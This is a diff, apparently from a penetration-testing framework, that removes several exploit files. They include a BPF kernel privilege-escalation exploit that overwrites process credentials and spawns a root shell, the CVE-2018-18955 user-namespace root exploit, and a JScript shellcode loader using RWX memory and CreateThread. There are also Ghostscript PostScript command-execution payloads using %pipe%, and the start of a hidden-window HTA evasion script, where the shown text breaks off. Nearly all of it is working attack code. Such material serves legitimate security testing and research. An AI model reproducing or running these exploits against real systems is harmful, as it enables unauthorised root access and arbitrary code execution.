-
-static __u64 ptr_to_u64(void *ptr)
-{
-	return (__u64) (unsigned long) ptr;
-}
-
-int bpf_prog_load(enum bpf_prog_type prog_type,
-		  const struct bpf_insn *insns, int prog_len,
-		  const char *license, int kern_version)
-{
-	union bpf_attr attr = {
-		.prog_type = prog_type,
-		.insns = ptr_to_u64((void *) insns),
-		.insn_cnt = prog_len / sizeof(struct bpf_insn),
-		.license = ptr_to_u64((void *) license),
-		.log_buf = ptr_to_u64(bpf_log_buf),
-		.log_size = LOG_BUF_SIZE,
-		.log_level = 1,
-	};
-
-	attr.kern_version = kern_version;
-
-	bpf_log_buf[0] = 0;
-
-	return syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));
-}
-
-int bpf_create_map(enum bpf_map_type map_type, int key_size, int value_size,
-		   int max_entries, int map_flags)
-{
-	union bpf_attr attr = {
-		.map_type = map_type,
-		.key_size = key_size,
-		.value_size = value_size,
-		.max_entries = max_entries
-	};
-
-	return syscall(__NR_bpf, BPF_MAP_CREATE, &attr, sizeof(attr));
-}
-
-int bpf_update_elem(int fd, void *key, void *value, unsigned long long flags)
-{
-	union bpf_attr attr = {
-		.map_fd = fd,
-		.key = ptr_to_u64(key),
-		.value = ptr_to_u64(value),
-		.flags = flags,
-	};
-
-	return syscall(__NR_bpf, BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr));
-}
-
-int bpf_lookup_elem(int fd, void *key, void *value)
-{
-	union bpf_attr attr = {
-		.map_fd = fd,
-		.key = ptr_to_u64(key),
-		.value = ptr_to_u64(value),
-	};
-
-	return syscall(__NR_bpf, BPF_MAP_LOOKUP_ELEM, &attr, sizeof(attr));
-}
-
-#define BPF_ALU64_IMM(OP, DST, IMM)				\
-	((struct bpf_insn) {					\
-		.code  = BPF_ALU64 | BPF_OP(OP) | BPF_K,	\
-		.dst_reg = DST,					\
-		.src_reg = 0,					\
-		.off   = 0,					\
-		.imm   = IMM })
-
-#define BPF_MOV64_REG(DST, SRC)					\
-	((struct bpf_insn) {					\
-		.code  = BPF_ALU64 | BPF_MOV | BPF_X,		\
-		.dst_reg = DST,					\
-		.src_reg = SRC,					\
-		.off   = 0,					\
-		.imm   = 0 })
-
-#define BPF_MOV32_REG(DST, SRC)					\
-	((struct bpf_insn) {					\
-		.code  = BPF_ALU | BPF_MOV | BPF_X,		\
-		.dst_reg = DST,					\
-		.src_reg = SRC,					\
-		.off   = 0,					\
-		.imm   = 0 })
-
-#define BPF_MOV64_IMM(DST, IMM)					\
-	((struct bpf_insn) {					\
-		.code  = BPF_ALU64 | BPF_MOV | BPF_K,		\
-		.dst_reg = DST,					\
-		.src_reg = 0,					\
-		.off   = 0,					\
-		.imm   = IMM })
-
-#define BPF_MOV32_IMM(DST, IMM)					\
-	((struct bpf_insn) {					\
-		.code  = BPF_ALU | BPF_MOV | BPF_K,		\
-		.dst_reg = DST,					\
-		.src_reg = 0,					\
-		.off   = 0,					\
-		.imm   = IMM })
-
-#define BPF_LD_IMM64(DST, IMM)					\
-	BPF_LD_IMM64_RAW(DST, 0, IMM)
-
-#define BPF_LD_IMM64_RAW(DST, SRC, IMM)				\
-	((struct bpf_insn) {					\
-		.code  = BPF_LD | BPF_DW | BPF_IMM,		\
-		.dst_reg = DST,					\
-		.src_reg = SRC,					\
-		.off   = 0,					\
-		.imm   = (__u32) (IMM) }),			\
-	((struct bpf_insn) {					\
-		.code  = 0, 					\
-		.dst_reg = 0,					\
-		.src_reg = 0,					\
-		.off   = 0,					\
-		.imm   = ((__u64) (IMM)) >> 32 })
-
-#ifndef BPF_PSEUDO_MAP_FD
-# define BPF_PSEUDO_MAP_FD	1
-#endif
-
-#define BPF_LD_MAP_FD(DST, MAP_FD)				\
-	BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)
-
-#define BPF_LDX_MEM(SIZE, DST, SRC, OFF)			\
-	((struct bpf_insn) {					\
-		.code  = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM,	\
-		.dst_reg = DST,					\
-		.src_reg = SRC,					\
-		.off   = OFF,					\
-		.imm   = 0 })
-
-#define BPF_STX_MEM(SIZE, DST, SRC, OFF)			\
-	((struct bpf_insn) {					\
-		.code  = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM,	\
-		.dst_reg = DST,					\
-		.src_reg = SRC,					\
-		.off   = OFF,					\
-		.imm   = 0 })
-
-#define BPF_ST_MEM(SIZE, DST, OFF, IMM)				\
-	((struct bpf_insn) {					\
-		.code  = BPF_ST | BPF_SIZE(SIZE) | BPF_MEM,	\
-		.dst_reg = DST,					\
-		.src_reg = 0,					\
-		.off   = OFF,					\
-		.imm   = IMM })
-
-#define BPF_JMP_IMM(OP, DST, IMM, OFF)				\
-	((struct bpf_insn) {					\
-		.code  = BPF_JMP | BPF_OP(OP) | BPF_K,		\
-		.dst_reg = DST,					\
-		.src_reg = 0,					\
-		.off   = OFF,					\
-		.imm   = IMM })
-
-#define BPF_RAW_INSN(CODE, DST, SRC, OFF, IMM)			\
-	((struct bpf_insn) {					\
-		.code  = CODE,					\
-		.dst_reg = DST,					\
-		.src_reg = SRC,					\
-		.off   = OFF,					\
-		.imm   = IMM })
-
-#define BPF_EXIT_INSN()						\
-	((struct bpf_insn) {					\
-		.code  = BPF_JMP | BPF_EXIT,			\
-		.dst_reg = 0,					\
-		.src_reg = 0,					\
-		.off   = 0,					\
-		.imm   = 0 })
-
-#define BPF_DISABLE_VERIFIER()                                                       \
-	BPF_MOV32_IMM(BPF_REG_2, 0xFFFFFFFF),             /* r2 = (u32)0xFFFFFFFF   */   \
-	BPF_JMP_IMM(BPF_JNE, BPF_REG_2, 0xFFFFFFFF, 2),   /* if (r2 == -1) {        */   \
-	BPF_MOV64_IMM(BPF_REG_0, 0),                      /*   exit(0);             */   \
-	BPF_EXIT_INSN()                                   /* }                      */   \
-
-#define BPF_MAP_GET(idx, dst)                                                        \
-	BPF_MOV64_REG(BPF_REG_1, BPF_REG_9),              /* r1 = r9                */   \
-	BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),             /* r2 = fp                */   \
-	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),            /* r2 = fp - 4            */   \
-	BPF_ST_MEM(BPF_W, BPF_REG_10, -4, idx),           /* *(u32 *)(fp - 4) = idx */   \
-	BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),             \
-	BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),            /* if (r0 == 0)           */   \
-	BPF_EXIT_INSN(),                                  /*   exit(0);             */   \
-	BPF_LDX_MEM(BPF_DW, (dst), BPF_REG_0, 0)          /* r_dst = *(u64 *)(r0)   */              
-
-static int load_prog() {
-	struct bpf_insn prog[] = {
-		BPF_DISABLE_VERIFIER(),
-
-		BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_1, -16),   /* *(fp - 16) = r1       */
-
-		BPF_LD_MAP_FD(BPF_REG_9, mapfd),
-
-		BPF_MAP_GET(0, BPF_REG_6),                         /* r6 = op               */
-		BPF_MAP_GET(1, BPF_REG_7),                         /* r7 = address          */
-		BPF_MAP_GET(2, BPF_REG_8),                         /* r8 = value            */
-
-		/* store map slot address in r2 */
-		BPF_MOV64_REG(BPF_REG_2, BPF_REG_0),               /* r2 = r0               */
-		BPF_MOV64_IMM(BPF_REG_0, 0),                       /* r0 = 0  for exit(0)   */
-
-		BPF_JMP_IMM(BPF_JNE, BPF_REG_6, 0, 2),             /* if (op == 0)          */
-		/* get fp */
-		BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_10, 0),
-		BPF_EXIT_INSN(),
-
-		BPF_JMP_IMM(BPF_JNE, BPF_REG_6, 1, 3),             /* else if (op == 1)     */
-		/* get skbuff */
-		BPF_LDX_MEM(BPF_DW, BPF_REG_3, BPF_REG_10, -16),
-		BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_3, 0),
-		BPF_EXIT_INSN(),
-
-		BPF_JMP_IMM(BPF_JNE, BPF_REG_6, 2, 3),             /* else if (op == 2)     */
-		/* read */
-		BPF_LDX_MEM(BPF_DW, BPF_REG_3, BPF_REG_7, 0),
-		BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_3, 0),
-		BPF_EXIT_INSN(),
-		/* else                  */
-		/* write */
-		BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0), 
-		BPF_EXIT_INSN(),
-
-	};
-	return bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, prog, sizeof(prog), "GPL", 0);
-}
-
-void info(const char *fmt, ...) {
-	va_list args;
-	va_start(args, fmt);
-	fprintf(stdout, "[.] ");
-	vfprintf(stdout, fmt, args);
-	va_end(args);
-}
-
-void msg(const char *fmt, ...) {
-	va_list args;
-	va_start(args, fmt);
-	fprintf(stdout, "[*] ");
-	vfprintf(stdout, fmt, args);
-	va_end(args);
-}
-
-void redact(const char *fmt, ...) {
-	va_list args;
-	va_start(args, fmt);
-	if(doredact) {
-		fprintf(stdout, "[!] ( ( R E D A C T E D ) )\n");
-		return;
-	}
-	fprintf(stdout, "[*] ");
-	vfprintf(stdout, fmt, args);
-	va_end(args);
-}
-
-void fail(const char *fmt, ...) {
-	va_list args;
-	va_start(args, fmt);
-	fprintf(stdout, "[!] ");
-	vfprintf(stdout, fmt, args);
-	va_end(args);
-	exit(1);
-}
-
-void 
-initialize() {
-	info("\n");
-	info("t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)\n");
-	info("\n");
-	info("  ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **\n");
-	info("\n");
-
-	redact("creating bpf map\n");
-	mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(int), sizeof(long long), 3, 0);
-	if (mapfd < 0) {
-		fail("failed to create bpf map: '%s'\n", strerror(errno));
-	}
-
-	redact("sneaking evil bpf past the verifier\n");
-	progfd = load_prog();
-	if (progfd < 0) {
-		if (errno == EACCES) {
-			msg("log:\n%s", bpf_log_buf);
-		}
-		fail("failed to load prog '%s'\n", strerror(errno));
-	}
-
-	redact("creating socketpair()\n");
-	if(socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets)) {
-		fail("failed to create socket pair '%s'\n", strerror(errno));
-	}
-
-	redact("attaching bpf backdoor to socket\n");
-	if(setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)) < 0) {
-		fail("setsockopt '%s'\n", strerror(errno));
-	}
-}
-
-static void writemsg() {
-	ssize_t n = write(sockets[0], buffer, sizeof(buffer));
-	if (n < 0) {
-		perror("write");
-		return;
-	}
-	if (n != sizeof(buffer)) {
-		fprintf(stderr, "short write: %zd\n", n);
-	}
-}
-
-static void 
-update_elem(int key, unsigned long value) {
-	if (bpf_update_elem(mapfd, &key, &value, 0)) {
-		fail("bpf_update_elem failed '%s'\n", strerror(errno));
-	}
-}
-
-static unsigned long 
-get_value(int key) {
-	unsigned long value;
-	if (bpf_lookup_elem(mapfd, &key, &value)) {
-		fail("bpf_lookup_elem failed '%s'\n", strerror(errno));
-	}
-	return value;
-}
-
-static unsigned long
-sendcmd(unsigned long op, unsigned long addr, unsigned long value) {
-	update_elem(0, op);
-	update_elem(1, addr);
-	update_elem(2, value);
-	writemsg();
-	return get_value(2);
-}
-
-unsigned long
-get_skbuff() {
-	return sendcmd(1, 0, 0);
-}
-
-unsigned long
-get_fp() {
-	return sendcmd(0, 0, 0);
-}
-
-unsigned long
-read64(unsigned long addr) {
-	return sendcmd(2, addr, 0);
-}
-
-void
-write64(unsigned long addr, unsigned long val) {
-	(void)sendcmd(3, addr, val);
-}
-
-static unsigned long find_cred() {
-	uid_t uid = getuid();
-	unsigned long skbuff = get_skbuff();
-	/*
-	 * struct sk_buff {
-	 *     [...24 byte offset...]
-	 *     struct sock     *sk;
-	 * };
-	 *
-	 */
-
-	unsigned long sock_addr = read64(skbuff + 24);
-	msg("skbuff => %llx\n", skbuff);
-	msg("Leaking sock struct from %llx\n", sock_addr);	
-	if(sock_addr < PHYS_OFFSET){
-		fail("Failed to find Sock address from sk_buff.\n");
-	}	
-		
-	/*
-	 * scan forward for expected sk_rcvtimeo value.
-	 *
-	 * struct sock {
-	 *    [...]
-	 *    const struct cred      *sk_peer_cred; 
-	 *    long                    sk_rcvtimeo;             
-	 *  };
-	 */
-	for (int i = 0; i < 100; i++, sock_addr += 8) {
-		if(read64(sock_addr) == 0x7FFFFFFFFFFFFFFF) {
-			unsigned long cred_struct = read64(sock_addr - 8);
-			if(cred_struct < PHYS_OFFSET) {
-				continue;
-			}
-			
-			unsigned long test_uid = (read64(cred_struct + 8) & 0xFFFFFFFF);
-			
-			if(test_uid != uid) {
-				continue;
-			}
-                        msg("Sock->sk_rcvtimeo at offset %d\n", i * 8);
-                        msg("Cred structure at %llx\n", cred_struct);
-			msg("UID from cred structure: %d, matches the current: %d\n", test_uid, uid);
-			
-			return cred_struct;
-		}
-	}
-	fail("failed to find sk_rcvtimeo.\n");
-}
-
-static void
-hammer_cred(unsigned long addr) {
-	msg("hammering cred structure at %llx\n", addr);
-#define w64(w) { write64(addr, (w)); addr += 8; }
-	unsigned long val = read64(addr) & 0xFFFFFFFFUL;
-	w64(val); 
-	w64(0); w64(0); w64(0); w64(0);
-	w64(0xFFFFFFFFFFFFFFFF); 
-	w64(0xFFFFFFFFFFFFFFFF); 
-	w64(0xFFFFFFFFFFFFFFFF); 
-#undef w64
-}
-
-int
-main(int argc, char **argv) {
-	initialize();
-	hammer_cred(find_cred());
-	msg("credentials patched, launching shell...\n");
-	if(execl("/bin/sh", "/bin/sh", NULL)) {
-		fail("exec %s\n", strerror(errno));
-	}
-}
-

data/exploits/cve-2018-18955/subshell.c

@@ -1,52 +0,0 @@
-// subshell.c
-// author: Jann Horn
-// source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1712
-
-#define _GNU_SOURCE
-#include <unistd.h>
-#include <grp.h>
-#include <err.h>
-#include <stdio.h>
-#include <fcntl.h>
-#include <sys/socket.h>
-#include <sys/un.h>
-#include <sched.h>
-#include <sys/wait.h>
-
-int main() {
-  int sync_pipe[2];
-  char dummy;
-  if (socketpair(AF_UNIX, SOCK_STREAM, 0, sync_pipe)) err(1, "pipe");
-
-  pid_t child = fork();
-  if (child == -1) err(1, "fork");
-  if (child == 0) {
-    close(sync_pipe[1]);
-    if (unshare(CLONE_NEWUSER)) err(1, "unshare userns");
-    if (write(sync_pipe[0], "X", 1) != 1) err(1, "write to sock");
-
-    if (read(sync_pipe[0], &dummy, 1) != 1) err(1, "read from sock");
-    execl("/bin/bash", "bash", NULL);
-    err(1, "exec");
-  }
-
-  close(sync_pipe[0]);
-  if (read(sync_pipe[1], &dummy, 1) != 1) err(1, "read from sock");
-  char pbuf[100];
-  sprintf(pbuf, "/proc/%d", (int)child);
-  if (chdir(pbuf)) err(1, "chdir");
-  const char *id_mapping = "0 0 1\n1 1 1\n2 2 1\n3 3 1\n4 4 1\n5 5 995\n";
-  int uid_map = open("uid_map", O_WRONLY);
-  if (uid_map == -1) err(1, "open uid map");
-  if (write(uid_map, id_mapping, strlen(id_mapping)) != strlen(id_mapping)) err(1, "write uid map");
-  close(uid_map);
-  int gid_map = open("gid_map", O_WRONLY);
-  if (gid_map == -1) err(1, "open gid map");
-  if (write(gid_map, id_mapping, strlen(id_mapping)) != strlen(id_mapping)) err(1, "write gid map");
-  close(gid_map);
-  if (write(sync_pipe[1], "X", 1) != 1) err(1, "write to sock");
-
-  int status;
-  if (wait(&status) != child) err(1, "wait");
-  return 0;
-}

data/exploits/cve-2018-18955/subuid_shell.c

@@ -1,272 +0,0 @@
-// subuid_shell.c - Linux local root exploit for CVE-2018-18955
-// Exploits broken uid/gid mapping in nested user namespaces.
-// ---
-// Mostly stolen from Jann Horn's exploit:
-// - https://bugs.chromium.org/p/project-zero/issues/detail?id=1712
-// Some code stolen from Xairy's exploits:
-// - https://github.com/xairy/kernel-exploits
-// ---
-// <bcoles@gmail.com>
-// - added auto subordinate id mapping
-// https://github.com/bcoles/kernel-exploits/tree/cve-2018-18955
-
-#define _GNU_SOURCE
-
-#include <unistd.h>
-#include <fcntl.h>
-#include <grp.h>
-#include <pwd.h>
-#include <sched.h>
-#include <stdio.h>
-#include <sys/socket.h>
-#include <sys/un.h>
-#include <sys/wait.h>
-#include <stdarg.h>
-#include <stdlib.h>
-#include <string.h>
-#include <signal.h>
-#include <sys/prctl.h>
-
-#define DEBUG
-
-#ifdef DEBUG
-#  define dprintf printf
-#else
-#  define dprintf
-#endif
-
-char* SUBSHELL = "./subshell";
-
-
-// * * * * * * * * * * * * * * * * * File I/O * * * * * * * * * * * * * * * * *
-
-#define CHUNK_SIZE 1024
-
-int read_file(const char* file, char* buffer, int max_length) {
-  int f = open(file, O_RDONLY);
-  if (f == -1)
-    return -1;
-  int bytes_read = 0;
-  while (1) {
-    int bytes_to_read = CHUNK_SIZE;
-    if (bytes_to_read > max_length - bytes_read)
-      bytes_to_read = max_length - bytes_read;
-    int rv = read(f, &buffer[bytes_read], bytes_to_read);
-    if (rv == -1)
-      return -1;
-    bytes_read += rv;
-    if (rv == 0)
-      return bytes_read;
-  }
-}
-
-static int write_file(const char* file, const char* what, ...) {
-  char buf[1024];
-  va_list args;
-  va_start(args, what);
-  vsnprintf(buf, sizeof(buf), what, args);
-  va_end(args);
-  buf[sizeof(buf) - 1] = 0;
-  int len = strlen(buf);
-
-  int fd = open(file, O_WRONLY | O_CLOEXEC);
-  if (fd == -1)
-    return -1;
-  if (write(fd, buf, len) != len) {
-    close(fd);
-    return -1;
-  }
-  close(fd);
-  return 0;
-}
-
-
-// * * * * * * * * * * * * * * * * * Map * * * * * * * * * * * * * * * * *
-
-int get_subuid(char* output, int max_length) {
-  char buffer[1024];
-  char* path = "/etc/subuid";
-  int length = read_file(path, &buffer[0], sizeof(buffer));
-  if (length == -1)
-    return -1;
-
-  int real_uid = getuid();
-  struct passwd *u = getpwuid(real_uid);
-
-  char needle[1024];
-  sprintf(needle, "%s:", u->pw_name);
-  int needle_length = strlen(needle);
-  char* found = memmem(&buffer[0], length, needle, needle_length);
-  if (found == NULL)
-    return -1;
-
-  int i;
-  for (i = 0; found[needle_length + i] != ':'; i++) {
-    if (i >= max_length)
-      return -1;
-    if ((found - &buffer[0]) + needle_length + i >= length)
-      return -1;
-    output[i] = found[needle_length + i];
-  }
-
-  return 0;
-}
-
-int get_subgid(char* output, int max_length) {
-  char buffer[1024];
-  char* path = "/etc/subgid";
-  int length = read_file(path, &buffer[0], sizeof(buffer));
-  if (length == -1)
-    return -1;
-
-  int real_gid = getgid();
-  struct group *g = getgrgid(real_gid);
-
-  char needle[1024];
-  sprintf(needle, "%s:", g->gr_name);
-  int needle_length = strlen(needle);
-  char* found = memmem(&buffer[0], length, needle, needle_length);
-  if (found == NULL)
-    return -1;
-
-  int i;
-  for (i = 0; found[needle_length + i] != ':'; i++) {
-    if (i >= max_length)
-      return -1;
-    if ((found - &buffer[0]) + needle_length + i >= length)
-      return -1;
-    output[i] = found[needle_length + i];
-  }
-
-  return 0;
-}
-
-
-// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * *
-
-int main(int argc, char** argv) {
-  if (argc > 1) SUBSHELL = argv[1];
-
-  dprintf("[.] starting\n");
-
-  dprintf("[.] setting up namespace\n");
-
-  int sync_pipe[2];
-  char dummy;
-
-  if (socketpair(AF_UNIX, SOCK_STREAM, 0, sync_pipe)) {
-    dprintf("[-] pipe\n");
-    exit(EXIT_FAILURE);
-  }
-
-  pid_t child = fork();
-
-  if (child == -1) {
-    dprintf("[-] fork");
-    exit(EXIT_FAILURE);
-  }
-
-  if (child == 0) {
-    prctl(PR_SET_PDEATHSIG, SIGKILL);
-    close(sync_pipe[1]);
-
-    if (unshare(CLONE_NEWUSER) != 0) {
-      dprintf("[-] unshare(CLONE_NEWUSER)\n");
-      exit(EXIT_FAILURE);
-    }
-
-    if (unshare(CLONE_NEWNET) != 0) {
-      dprintf("[-] unshare(CLONE_NEWNET)\n");
-      exit(EXIT_FAILURE);
-    }
-
-    if (write(sync_pipe[0], "X", 1) != 1) {
-      dprintf("write to sock\n");
-      exit(EXIT_FAILURE);
-    }
-
-    if (read(sync_pipe[0], &dummy, 1) != 1) {
-      dprintf("[-] read from sock\n");
-      exit(EXIT_FAILURE);
-    }
-
-    if (setgid(0)) {
-      dprintf("[-] setgid");
-      exit(EXIT_FAILURE);
-    }
-
-    if (setuid(0)) {
-      printf("[-] setuid");
-      exit(EXIT_FAILURE);
-    }
-
-    execl(SUBSHELL, "", NULL);
-
-    dprintf("[-] executing subshell failed\n");
-  }
-
-  close(sync_pipe[0]);
-
-  if (read(sync_pipe[1], &dummy, 1) != 1) {
-    dprintf("[-] read from sock\n");
-    exit(EXIT_FAILURE);
-  }
-
-  char path[256];
-  sprintf(path, "/proc/%d/setgroups", (int)child);
-
-  if (write_file(path, "deny") == -1) {
-    dprintf("[-] denying setgroups failed\n");
-    exit(EXIT_FAILURE);
-  }
-
-  dprintf("[~] done, namespace sandbox set up\n");
-
-  dprintf("[.] mapping subordinate ids\n");
-  char subuid[64];
-  char subgid[64];
-
-  if (get_subuid(&subuid[0], sizeof(subuid))) {
-    dprintf("[-] couldn't find subuid map in /etc/subuid\n");
-    exit(EXIT_FAILURE);
-  }
-
-  if (get_subgid(&subgid[0], sizeof(subgid))) {
-    dprintf("[-] couldn't find subgid map in /etc/subgid\n");
-    exit(EXIT_FAILURE);
-  }
-
-  dprintf("[.] subuid: %s\n", subuid);
-  dprintf("[.] subgid: %s\n", subgid);
-
-  char cmd[256];
-
-  sprintf(cmd, "newuidmap %d 0 %s 1000", (int)child, subuid);
-  if (system(cmd))  {
-    dprintf("[-] newuidmap failed");
-    exit(EXIT_FAILURE);
-  }
-
-  sprintf(cmd, "newgidmap %d 0 %s 1000", (int)child, subgid);
-  if (system(cmd)) {
-    dprintf("[-] newgidmap failed");
-    exit(EXIT_FAILURE);
-  }
-
-  dprintf("[~] done, mapped subordinate ids\n");
-
-  dprintf("[.] executing subshell\n");
-
-  if (write(sync_pipe[1], "X", 1) != 1) {
-    dprintf("[-] write to sock");
-    exit(EXIT_FAILURE);
-  }
-
-  int status;
-  if (wait(&status) != child) {
-    dprintf("[-] wait");
-    exit(EXIT_FAILURE);
-  }
-
-  return 0;
-}

data/exploits/evasion_shellcode.js

@@ -1,77 +0,0 @@
-import System;
-import System.Runtime.InteropServices;
-import System.Reflection;
-import System.Reflection.Emit;
-import System.Runtime;
-import System.Text;
- 
-function InvokeWin32(dllName:String, returnType:Type,
-  methodName:String, parameterTypes:Type[], parameters:Object[])
-{
-  // Begin to build the dynamic assembly
-  var domain = AppDomain.CurrentDomain;
-  var name = new System.Reflection.AssemblyName('PInvokeAssembly');
-  var assembly = domain.DefineDynamicAssembly(name, AssemblyBuilderAccess.Run);
-  var module = assembly.DefineDynamicModule('PInvokeModule');
-  var type = module.DefineType('PInvokeType',TypeAttributes.Public + TypeAttributes.BeforeFieldInit);
- 
-  // Define the actual P/Invoke method
-  var method = type.DefineMethod(methodName, MethodAttributes.Public + MethodAttributes.HideBySig + MethodAttributes.Static + MethodAttributes.PinvokeImpl, returnType, parameterTypes);
- 
-  // Apply the P/Invoke constructor
-  var ctor = System.Runtime.InteropServices.DllImportAttribute.GetConstructor([Type.GetType("System.String")]);
-  var attr = new System.Reflection.Emit.CustomAttributeBuilder(ctor, [dllName]);
-  method.SetCustomAttribute(attr);
- 
-  // Create the temporary type, and invoke the method.
-  var realType = type.CreateType();
-  return realType.InvokeMember(methodName, BindingFlags.Public + BindingFlags.Static + BindingFlags.InvokeMethod, null, null, parameters);
-}
- 
-function VirtualAlloc( lpStartAddr:UInt32, size:UInt32, flAllocationType:UInt32, flProtect:UInt32)
-{
-  var parameterTypes:Type[] = [Type.GetType("System.UInt32"),Type.GetType("System.UInt32"),Type.GetType("System.UInt32"),Type.GetType("System.UInt32")];
-  var parameters:Object[] = [lpStartAddr, size, flAllocationType, flProtect];
-  
-  return InvokeWin32("kernel32.dll", Type.GetType("System.IntPtr"), "VirtualAlloc", parameterTypes,  parameters );
-}
-
-function CreateThread( lpThreadAttributes:UInt32, dwStackSize:UInt32, lpStartAddress:IntPtr, param:IntPtr, dwCreationFlags:UInt32, lpThreadId:UInt32)
-{
-  var parameterTypes:Type[] = [Type.GetType("System.UInt32"),Type.GetType("System.UInt32"),Type.GetType("System.IntPtr"),Type.GetType("System.IntPtr"), Type.GetType("System.UInt32"), Type.GetType("System.UInt32") ];
-  var parameters:Object[] = [lpThreadAttributes, dwStackSize, lpStartAddress, param, dwCreationFlags, lpThreadId ];
-  
-  return InvokeWin32("kernel32.dll", Type.GetType("System.IntPtr"), "CreateThread", parameterTypes,  parameters );
-}
-
-function WaitForSingleObject( handle:IntPtr, dwMiliseconds:UInt32)
-{
-  var parameterTypes:Type[] = [Type.GetType("System.IntPtr"),Type.GetType("System.UInt32")];
-  var parameters:Object[] = [handle, dwMiliseconds ];
-  
-  return InvokeWin32("kernel32.dll", Type.GetType("System.IntPtr"), "WaitForSingleObject", parameterTypes,  parameters );
-}
-
-function ShellCodeExec()
-{
-  var MEM_COMMIT:uint = 0x1000;
-  var PAGE_EXECUTE_READWRITE:uint = 0x40;
-
-  var shellcodestr:String = '<%= file_payload %>'
-  var shellcode:Byte[] = System.Convert.FromBase64String(shellcodestr);
-  var funcAddr:IntPtr = VirtualAlloc(0, UInt32(shellcode.Length),MEM_COMMIT, PAGE_EXECUTE_READWRITE);
-  
-  
-  Marshal.Copy(shellcode, 0, funcAddr, shellcode.Length);
-  var hThread:IntPtr = IntPtr.Zero;
-  var threadId:UInt32 = 0;
-  // prepare data
-  var pinfo:IntPtr = IntPtr.Zero;
-  // execute native code
-  hThread = CreateThread(0, 0, funcAddr, pinfo, 0, threadId);
-  WaitForSingleObject(hThread, 0xFFFFFFFF);
-
-}
-try{
-ShellCodeExec();
-}catch(e){}

data/exploits/ghostscript/msf.ps

@@ -1,9 +0,0 @@
-%!PS
-userdict /setpagedevice undef
-a0
-currentpagedevice /HWResolution get 0 (metasploit) put
-{ grestore } stopped pop
-(ppmraw) selectdevice
-mark /OutputFile (%pipe%echo vulnerable > /dev/tty) currentdevice putdeviceprops
-{ showpage } stopped pop
-quit

data/exploits/ghostscript/testcase.ps

@@ -1,81 +0,0 @@
-%!PS
-% This is ghostscript bug #699687 (split out from bug #699654)
-
-% ImageMagick define setpagedevice, just remove their definition. This doesn't
-% do anything if not using ImageMagick.
-userdict /setpagedevice undef
-
-% function to check if we're on Linux or Windows
-/iswindows {
-    % Just checking if paths contain drive
-    null (w) .tempfile closefile 1 get 16#3A eq
-} def
-
-% just select a papersize to initialize page device
-a0
-
-% The bug is that if you can make grestore or restore fail non-fatally,
-% LockSafetyParams isn't restored properly. grestore will fail if you set crazy
-% properties in your pagedevice, like a nonsense resolution.
-%
-% Normally it would be something like [72.0 72.0], but you can't just def
-% HWResolution to something else (for example), because it's readonly:
-%
-% GS>currentpagedevice wcheck ==
-% false
-%
-% But you can just put or astore into it, because the array itself is writable:
-% GS>currentpagedevice /HWResolution get wcheck ==
-% true
-%
-% Lets just put some junk in there.
-currentpagedevice /HWResolution get 0 (foobar) put
-
-% This grestore will fail, stopped just catches the error instead of aborting.
-{ grestore } stopped pop
-
-% Now LockSafetyParams will be incorrectly unset, you can check like this:
-% GS>mark currentdevice getdeviceprops .dicttomark /.LockSafetyParams get == pop
-% false
-
-% We can change and configure devices now, so make sure we're using one with
-% a OutputFile property.
-(ppmraw) selectdevice
-
-% Check if we're on Windows or UNIX
-iswindows {
-    % This is Windows, gswin32c.exe supports %pipe%, so you can just run calc.exe.
-    %
-    % The graphical version doesn't seem to support %pipe%, but you can create
-    % arbitrary files. If something is using the api (gs32dll.dll), it may or
-    % may not support %pipe%.
-
-    /getstartupdirwindows {
-        % This figures out startup location from %TEMP% (Tested on Win10)
-        (C:\\USERS\\XXXXXX~1\\STARTM~1\\PROGRAMS\\STARTUP\\)
-        dup 0 null (w) .tempfile closefile 0 18 getinterval putinterval
-    } def
-
-    % (directory) (extension) randfile (result)
-    /randfile {
-        % pick a random filename
-        exch rand 32 string cvs concatstrings exch concatstrings
-    } def
-
-    mark /OutputFile (%pipe%calc.exe) currentdevice putdeviceprops
-
-    % if you need to create files, use txtwrite like this:
-
-    %mark /OutputFile getstartupdirwindows (.bat) randfile
-    %   { (txtwrite) selectdevice } stopped pop putdeviceprops setdevice
-    %0 0 moveto
-    %(REM This is an exploit demo\n) show
-    %(calc.exe\n) show
-} {
-    % This is UNIX, just run a shell command
-    mark /OutputFile (%pipe%id) currentdevice putdeviceprops
-} ifelse
-
-{ showpage } stopped pop
-
-quit

data/exploits/hta_evasion.hta

@@ -1,151 +0,0 @@
-<html>
-  <head>
-    <HTA:APPLICATION WINDOWSTATE="minimize" SHOWINTASKBAR="no" SYSMENU="no" CAPTION="no" />
-  </head>
-</html>
-<script>
-  window.resizeTo(1, 1);
-  window.moveTo(-2000, -2000);
-  // Base64 implementation found on http://www.webtoolkit.info/javascript-base64.html
-  // variable names changed to make obfuscation easier
-  var Base64 = {
-    // private property
-    _keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
-
-    // public method for decoding
-    decode : function (input) {
-      var output = "";
-      var chr1, chr2, chr3;
-      var enc1, enc2, enc3, enc4;
-      var i = 0;
-
-      input = input.replace(/[^A-Za-z0-9\+\/\\=]/g, "");
-
-      while (i < input.length) {
-
